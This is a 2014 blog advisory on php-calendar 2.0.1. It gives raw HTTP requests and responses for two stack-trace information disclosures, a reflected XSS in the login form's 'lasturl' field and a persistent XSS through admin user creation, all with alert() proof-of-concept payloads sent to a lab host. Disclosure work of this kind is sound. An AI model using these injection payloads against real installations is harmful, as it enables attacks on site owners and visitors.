Thursday, 27 February 2014

[EN] Multiple vulnerabilities in php-calendar 2.0.1

# ==============================================================
# Title ...| PHP Calendar Multiple vulnerabilities
# Version .| php-calendar-2.0.1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================

[+] As guest

# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/phpcalendar/php-calendar-2.0.1/index.php?action='`"%3b--#%%2f%2a&year=2014&month=1&day=28 HTTP/1.1
Host: 10.149.14.62
---<request>---

---<response>---
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(676): soft_error('Invalid action')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#3 {main}</pre>
---<response>---



# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

lasturl='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&action=login&submit=Log+in&username=admin&password=asd
---<request>---



# ==============================================================
# 3. Information disclosure bug

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 132

action=search&phpcid=1&searchstring=asdasd&search-from-date='`"%3b--#%%2f%2a&search-to-date=02%2F21%2F2014&sort=start_date&order=ASC

---<request>---


---<response>---
<div class="phpc-main"><h2>Error</h2>
<p>Malformed &quot;search-from&quot; date: &quot;\'`\&quot;;--#%/*&quot;</p>
<h3>Backtrace</h3>
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(843): soft_error('Malformed &quot;sear...')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(31): get_timestamp('search-from')
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(129): search_results()
#3 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680) : eval()'d code(1): search()
#4 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680): eval()
#5 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#6 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#7 {main}</pre>
---<response>---

# ==============================================================
# [+] From admin logged-in

# ==============================================================
# 4. Persistent XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 197

phpc_token=ALRTjtU1Qnv0LMm1G_BeiQSEUyGGHPYGrGMk8L6sfaI&action=user_create&submit_form=submit_form&submit=Submit&user_name='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&password1=aaaaa&password2=aaaaa
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a Comment

What do You think...?